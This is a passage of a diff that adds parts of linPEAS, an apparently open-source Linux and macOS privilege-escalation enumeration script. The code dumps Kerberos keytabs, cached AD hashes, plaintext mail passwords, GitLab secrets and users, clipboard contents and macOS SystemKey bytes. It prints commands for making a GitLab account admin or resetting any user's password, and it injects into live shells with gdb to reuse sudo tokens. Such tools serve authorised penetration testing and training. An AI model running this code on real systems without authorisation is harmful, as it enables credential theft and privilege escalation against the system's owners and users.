grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
fi
echo ""
#-- SI) PAM auth
print_2title "Searching unexpected auth lines in /etc/pam.d/sshd"
pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth)
if [ "$pamssh" ]; then
grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED},"
else echo_no
fi
echo ""
#-- SI) NFS exports
print_2title "NFS exports?"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe"
if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED},"
else echo_not_found "/etc/exports"
fi
echo ""
#-- SI) Kerberos
print_2title "Searching kerberos conf files and tickets"
print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory"
kadmin_exists="$(command -v kadmin)"
klist_exists="$(command -v klist)"
if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi
if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi
ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g";
else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g";
fi
printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do
if [ -r "$f" ]; then
if echo "$f" | grep -q .k5login; then
echo ".k5login file (users with access to the user who has this file in his home)"
cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
elif echo "$f" | grep -q keytab; then
echo ""
echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords"
klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do
if [ "$l" ] && echo "$l" | grep -q "@"; then
printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E} "s,$l,${SED_RED},g"
#kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
#We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
fi
done
elif echo "$f" | grep -q krb5.conf; then
ls -l "$f"
cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},";
elif echo "$f" | grep -q kadm5.acl; then
ls -l "$f"
cat "$f" 2>/dev/null
elif echo "$f" | grep -q sssd.conf; then
ls -l "$f"
cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},";
elif echo "$f" | grep -q secrets.ldb; then
echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
ls -l "$f"
elif echo "$f" | grep -q .secrets.mkey; then
echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
ls -l "$f"
fi
fi
done
ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos"
klist 2>/dev/null || echo_not_found "klist"
echo ""
peass{Knockd}
peass{Kibana}
peass{Elasticsearch}
##-- SI) Logstash
print_2title "Searching logstash files"
if [ "$PSTORAGE_LOGSTASH" ]; then
printf "$PSTORAGE_LOGSTASH\n"
printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do
if [ -r "$d/startup.options" ]; then
echo "Logstash is running as user:"
cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED},"
fi
cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E} "s,exec\W*\{|command\W*=>,${SED_RED},"
cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED},"
done
else echo_not_found
fi
echo ""
#-- SI) Vault-ssh
print_2title "Searching Vault-ssh files"
if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then
printf "$PSTORAGE_VAULT_SSH_HELPER\n"
printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done
echo ""
vault secrets list 2>/dev/null
printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
else echo_not_found "vault-ssh-helper.hcl"
fi
echo ""
#-- SI) Cached AD Hashes
adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null)
print_2title "Searching AD cached hashes"
if [ "$adhashes" ]; then
ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null
else echo_not_found "cached hashes"
fi
echo ""
#-- SI) Screen sessions
print_2title "Searching screen sessions"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
screensess=$(screen -ls 2>/dev/null)
if [ "$screensess" ]; then
printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m,"
else echo_not_found "screen"
fi
echo ""
#-- SI) Tmux sessions
tmuxdefsess=$(tmux ls 2>/dev/null)
tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep)
print_2title "Searching tmux sessions"$N
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then
printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m,"
else echo_not_found "tmux"
fi
echo ""
peass{CouchDB}
peass{Redis}
#-- SI) Dovecot
# Needs testing
print_2title "Searching dovecot files"
dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null)
if [ -z "$dovecotpass" ]; then
echo_not_found "dovecot credentials"
else
for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do
df=$(echo $d |cut -d ':' -f1)
dp=$(echo $d |cut -d ':' -f2-)
echo "Found possible PLAIN text creds in $df"
echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
done
fi
echo ""
peass{Mosquitto}
peass{Neo4j}
peass{Cloud Credentials}
peass{Cloud Init}
peass{CloudFlare}
peass{Erlang}
peass{GMV Auth}
peass{IPSec}
peass{IRSSI}
peass{Keyring}
peass{Filezilla}
peass{Backup Manager}
##-- SI) passwd files (splunk)
print_2title "Searching uncommon passwd files (splunk)"
SPLUNK_BIN="$(command -v splunk 2>/dev/null)"
if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi
printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do
if [ -f "$f" ] && ! [ -x "$f" ]; then
echo "passwd file: $f" | sed "s,$f,${SED_RED},"
cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED},"
fi
done
echo ""
print_2title "Analyzing kcpassword files"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword"
printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do
echo "$f" | sed -${E} "s,.*,${SED_RED},"
base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
done
echo ""
##-- SI) Gitlab
print_2title "Searching GitLab related files"
#Check gitlab-rails
if [ "$(command -v gitlab-rails)" ]; then
echo "gitlab-rails was found. Trying to dump users..."
gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED},"
echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'"
echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
echo ""
fi
if [ "$(command -v gitlab-backup)" ]; then
echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'"
echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'"
echo ""
fi
#Check gitlab files
printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do
if echo $f | grep -q secrets.yml; then
echo "Found $f" | sed "s,$f,${SED_RED},"
cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#"
elif echo $f | grep -q gitlab.yml; then
echo "Found $f" | sed "s,$f,${SED_RED},"
cat "$f" | grep -A 4 "repositories:"
elif echo $f | grep -q gitlab.rb; then
echo "Found $f" | sed "s,$f,${SED_RED},"
cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED},"
fi
echo ""
done
echo ""
peass{Github}
peass{Svn}
peass{PGP-GPG}
peass{Cache Vi}
peass{Wget}
##-- SI) containerd installed
print_2title "Checking if containerd(ctr) is available"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation"
containerd=$(command -v ctr)
if [ "$containerd" ]; then
echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
ctr image list
fi
echo ""
##-- SI) runc installed
print_2title "Checking if runc is available"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation"
runc=$(command -v runc)
if [ "$runc" ]; then
echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
fi
echo ""
#-- SI) Docker
print_2title "Searching docker files (limit 70)"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket"
printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do
ls -l "$f" 2>/dev/null
if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then
echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
fi
done
echo ""
peass{Firefox}
peass{Chrome}
peass{Autologin}
#-- SI) S/Key athentication
print_2title "S/Key authentication"
if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then
printf "System supports$RED S/Key$NC authentication\n"
if ! [ -d /etc/skey/ ]; then
echo "${GREEN}S/Key authentication enabled, but has not been initialized"
elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then
echo "${RED}/etc/skey/ is writable by you"
ls -ld /etc/skey/
else
ls -ld /etc/skey/ 2>/dev/null
fi
fi
echo ""
#-- SI) YubiKey athentication
print_2title "YubiKey authentication"
if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then
printf "System supports$RED YubiKey$NC authentication\n"
if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then
echo "${RED}/var/db/yubikey/ is writable by you"
ls -ld /var/db/yubikey/
else
ls -ld /var/db/yubikey/ 2>/dev/null
fi
fi
echo ""
#-- SI) Passwords inside pam.d
print_2title "Passwords inside pam.d"
grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
echo ""
peass{SNMP}
peass{Pypirc}
peass{Postfix}
peass{Ldaprc}
peass{Env}
peass{Msmtprc}
peass{Keepass}
peass{FTP}
peass{EXTRA_SECTIONS}
peass{Interesting logs}
peass{Windows Files}
peass{Other Interesting Files}

185
linPEAS/builder/linpeas_parts/system_information.sh Normal file
View File

@ -0,0 +1,185 @@
###########################################
#-------------) System Info (-------------#
###########################################
#-- SY) OS
print_2title "Operative system"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits"
(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
warn_exec lsb_release -a 2>/dev/null
if [ "$MACPEAS" ]; then
warn_exec system_profiler SPSoftwareDataType
fi
echo ""
#-- SY) Sudo
print_2title "Sudo version"
if [ "$(command -v sudo 2>/dev/null)" ]; then
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version"
sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
else echo_not_found "sudo"
fi
echo ""
#--SY) USBCreator
print_2title "USBCreator"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
if busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator; then
pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
if [ -z "$pc_version" ]; then
pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
fi
if [ -n "$pc_version" ]; then
pc_length=${#pc_version}
pc_major=$(echo "$pc_version" | cut -d. -f1)
pc_minor=$(echo "$pc_version" | cut -d. -f2)
if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then
echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
fi
fi
fi
echo ""
#-- SY) PATH
print_2title "PATH"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-path-abuses"
echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g"
echo ""
#-- SY) Date
print_2title "Date & uptime"
warn_exec date 2>/dev/null
warn_exec uptime 2>/dev/null
echo ""
#-- SY) System stats
print_2title "System stats"
(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
warn_exec free 2>/dev/null
echo ""
#-- SY) CPU info
print_2title "CPU info"
warn_exec lscpu 2>/dev/null
echo ""
#-- SY) Environment vars
print_2title "Environment"
print_info "Any private information inside environment variables?"
(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set"
echo ""
#-- SY) Dmesg
print_2title "Searching Signature verification failed in dmseg"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#dmesg-signature-verification-failed"
(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
echo ""
#-- SY) Kernel extensions
if [ "$MACPEAS" ]; then
print_2title "Kernel Extensions not belonging to apple"
kextstat 2>/dev/null | grep -Ev " com.apple."
print_2title "Unsigned Kernel Extensions"
macosNotSigned /Library/Extensions
macosNotSigned /System/Library/Extensions
fi
if [ "$(command -v bash 2>/dev/null)" ]; then
print_2title "Executing Linux Exploit Suggester"
print_info "https://github.com/mzet-/linux-exploit-suggester"
les_b64="peass{LES}"
echo $les_b64 | base64 -d | bash
echo ""
fi
if [ "$(command -v perl 2>/dev/null)" ]; then
print_2title "Executing Linux Exploit Suggester 2"
print_info "https://github.com/jondonas/linux-exploit-suggester-2"
les2_b64="peass{LES2}"
echo $les2_b64 | base64 -d | perl
echo ""
fi
if [ "$(command -v brew 2>/dev/null)" ]; then
print_2title "Brew Doctor Suggestions"
brew doctor
echo ""
fi
#-- SY) AppArmor
print_2title "Protections"
print_list "AppArmor enabled? .............. "$NC
if [ "$(command -v aa-status 2>/dev/null)" ]; then
aa-status 2>&1 | sed "s,disabled,${SED_RED},"
elif [ "$(command -v apparmor_status 2>/dev/null)" ]; then
apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
ls -d /etc/apparmor*
else
echo_not_found "AppArmor"
fi
#-- SY) grsecurity
print_list "grsecurity present? ............ "$NC
( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
#-- SY) PaX
print_list "PaX bins present? .............. "$NC
(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
#-- SY) Execshield
print_list "Execshield enabled? ............ "$NC
(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
#-- SY) SElinux
print_list "SELinux enabled? ............... "$NC
(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
#-- SY) Gatekeeper
if [ "$MACPEAS" ]; then
print_list "Gatekeeper enabled? .......... "$NC
(spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
print_list "sleepimage encrypted? ........ "$NC
(sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
print_list "XProtect? .................... "$NC
(system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
print_list "SIP enabled? ................. "$NC
csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
print_list "Connected to JAMF? ........... "$NC
warn_exec jamf checkJSSConnection
print_list "Connected to AD? ............. "$NC
dsconfigad -show && echo "" || echo_no
fi
#-- SY) ASLR
print_list "Is ASLR enabled? ............... "$NC
ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
if [ -z "$ASLR" ]; then
echo_not_found "/proc/sys/kernel/randomize_va_space";
else
if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
echo ""
fi
#-- SY) Printer
print_list "Printer? ....................... "$NC
(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
#-- SY) Running in a virtual environment
print_list "Is this a virtual machine? ..... "$NC
hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
if [ "$(command -v systemd-detect-virt 2>/dev/null)" ]; then
detectedvirt=$(systemd-detect-virt)
if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
else
if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
fi

226
linPEAS/builder/linpeas_parts/users_information.sh Normal file
View File

@ -0,0 +1,226 @@
###########################################
#----------) Users Information (----------#
###########################################
print_title "Users Information"
#-- UI) My user
print_2title "My user"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#users"
(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
echo ""
if [ "$MACPEAS" ];then
print_2title "Current user Login and Logout hooks"
defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
echo ""
print_2title "All Login and Logout hooks"
defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist
echo ""
print_2title "Keychains"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker"
security list-keychains
echo ""
print_2title "SystemKey"
ls -l /var/db/SystemKey
if [ -r "/var/db/SystemKey" ]; then
echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},";
hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},";
fi
echo ""
fi
#-- UI) PGP keys?
print_2title "Do I have PGP keys?"
command -v gpg 2>/dev/null || echo_not_found "gpg"
gpg --list-keys 2>/dev/null
command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys"
netpgpkeys --list-keys 2>/dev/null
command -v netpgp 2>/dev/null || echo_not_found "netpgp"
echo ""
#-- UI) Clipboard and highlighted text
print_2title "Clipboard or highlighted text?"
if [ "$(command -v xclip 2>/dev/null)" ]; then
echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
elif [ "$(command -v xsel 2>/dev/null)" ]; then
echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
elif [ "$(command -v pbpaste 2>/dev/null)" ]; then
echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
else echo_not_found "xsel and xclip"
fi
echo ""
#-- UI) Sudo -l
print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid"
(echo '' | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
if [ "$PASSWORD" ]; then
(echo "$PASSWORD" | sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "sudo"
fi
( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},") 2>/dev/null || echo_not_found "/etc/sudoers"
if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
fi
for filename in '/etc/sudoers.d/*'; do
if [ -r "$filename" ]; then
echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g"
grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW},"
fi
done
echo ""
#-- UI) Sudo tokens
print_2title "Checking sudo tokens"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#reusing-sudo-tokens"
ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0)" | sed "s,is disabled,${SED_RED},g";
else echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
fi
is_gdb="$(command -v gdb 2>/dev/null)"
if [ "$is_gdb" ]; then echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
else echo "gdb wasn't found in PATH, this might still be vulnerable but linpeas won't be able to check it" | sed "s,gdb,${SED_GREEN},g";
fi
if [ ! "$SUPERFAST" ] && [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ] && [ "$is_gdb" ]; then
echo "Checking for sudo tokens in other shells owned by current user"
for pid in $(pgrep '^(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$' -u "$(id -u)" 2>/dev/null | grep -v "^$$\$"); do
echo "Injecting process $pid -> "$(cat "/proc/$pid/comm" 2>/dev/null)
echo 'call system("echo | sudo -S touch /tmp/shrndom32r2r >/dev/null 2>&1 && echo | sudo -S chmod 777 /tmp/shrndom32r2r >/dev/null 2>&1")' | gdb -q -n -p "$pid" >/dev/null 2>&1
if [ -f "/tmp/shrndom32r2r" ]; then
echo "Sudo token reuse exploit worked with pid:$pid! (see link)" | sed -${E} "s,.*,${SED_RED_YELLOW},";
break
fi
done
if [ -f "/tmp/shrndom32r2r" ]; then
rm -f /tmp/shrndom32r2r 2>/dev/null
else echo "The escalation didn't work... (try again later?)"
fi
fi
echo ""
#-- UI) Doas
print_2title "Checking doas.conf"
doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then
cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW},"
else echo_not_found "doas.conf"
fi
echo ""
#-- UI) Pkexec policy
print_2title "Checking Pkexec policy"
print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
